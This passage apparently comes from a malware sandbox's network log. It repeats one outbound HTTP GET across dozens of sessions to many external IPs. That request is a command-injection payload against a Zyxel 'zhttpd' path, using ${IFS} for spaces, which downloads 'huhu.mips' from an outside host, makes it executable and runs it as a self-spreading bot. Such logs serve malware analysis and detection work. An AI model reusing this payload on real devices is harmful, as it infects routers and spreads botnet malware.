                                            Feb 2, 2024 06:20:58.357450008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            662192.168.2.1551466114.80.92.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357500076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            663192.168.2.154502899.87.5.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357525110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            664192.168.2.1533538157.82.55.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357557058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            665192.168.2.153887469.176.77.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357589006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            666192.168.2.154614220.245.87.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357625008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            667192.168.2.1533582107.24.86.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357657909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            668192.168.2.1546022121.156.205.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357706070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            669192.168.2.1558472165.35.19.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357738018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            670192.168.2.1537388223.56.117.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357763052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            671192.168.2.1534662113.101.227.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357791901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            672192.168.2.1538298190.196.146.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357855082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            673192.168.2.1544840190.10.244.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357894897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            674192.168.2.1548120206.182.81.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357925892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            675192.168.2.1551626102.122.165.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.357980013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            676192.168.2.1533918187.87.139.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358022928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            677192.168.2.1537480218.117.166.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358052969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            678192.168.2.154320487.121.190.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358093977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            679192.168.2.1539454138.231.236.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358124018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            680192.168.2.1549888120.140.46.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358151913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            681192.168.2.15571184.166.50.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358180046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            682192.168.2.153626482.239.168.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358222961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            683192.168.2.1533820122.83.214.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358257055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            684192.168.2.154107634.174.198.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358298063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            685192.168.2.1551160208.106.185.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358350039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            686192.168.2.1557398152.14.183.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358395100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            687192.168.2.153544039.202.231.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358421087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            688192.168.2.1542262220.122.15.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358470917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            689192.168.2.1555508216.211.16.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358505011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            690192.168.2.155600253.141.50.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358536005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            691192.168.2.1555940140.239.229.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358589888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            692192.168.2.1535202186.69.52.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358616114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            693192.168.2.154140250.102.167.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358648062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            694192.168.2.156082087.2.178.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358673096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            695192.168.2.1546620193.38.113.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358721972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            696192.168.2.1556672163.233.222.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358763933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            697192.168.2.1556188110.134.108.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358810902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            698192.168.2.154456863.156.17.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358850956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            699192.168.2.1557106137.193.51.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358891964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            700192.168.2.1534372131.62.154.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358915091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            701192.168.2.1542168191.73.223.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358963966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            702192.168.2.1549114182.55.27.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.358999014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            703192.168.2.155108632.249.158.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359030962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            704192.168.2.1560634157.29.239.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359075069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            705192.168.2.1545660152.192.215.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359103918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            706192.168.2.1542348129.213.189.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359133005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            707192.168.2.154674465.112.53.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359191895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            708192.168.2.1555510123.58.139.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359229088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            709192.168.2.155735614.107.173.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359277010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            710192.168.2.153648492.52.47.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359313011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            711192.168.2.1543176169.5.20.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359357119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            712192.168.2.155634070.35.243.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359380960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            713192.168.2.155403651.129.36.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359414101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            714192.168.2.1543182210.164.159.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359447956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            715192.168.2.1548234154.215.75.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359477997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            716192.168.2.153942620.171.130.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359509945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            717192.168.2.1553238221.219.150.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359545946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            718192.168.2.154860641.161.213.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359591007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            719192.168.2.1554984135.128.94.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359636068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            720192.168.2.153510290.176.209.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359675884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            721192.168.2.1543648131.214.249.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359714985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            722192.168.2.1543226101.37.56.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359741926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            723192.168.2.1553244162.63.133.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359774113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            724192.168.2.1552466114.200.18.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:58.359823942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            725192.168.2.1536758186.25.77.172443
                                            TimestampBytes transferredDirectionData
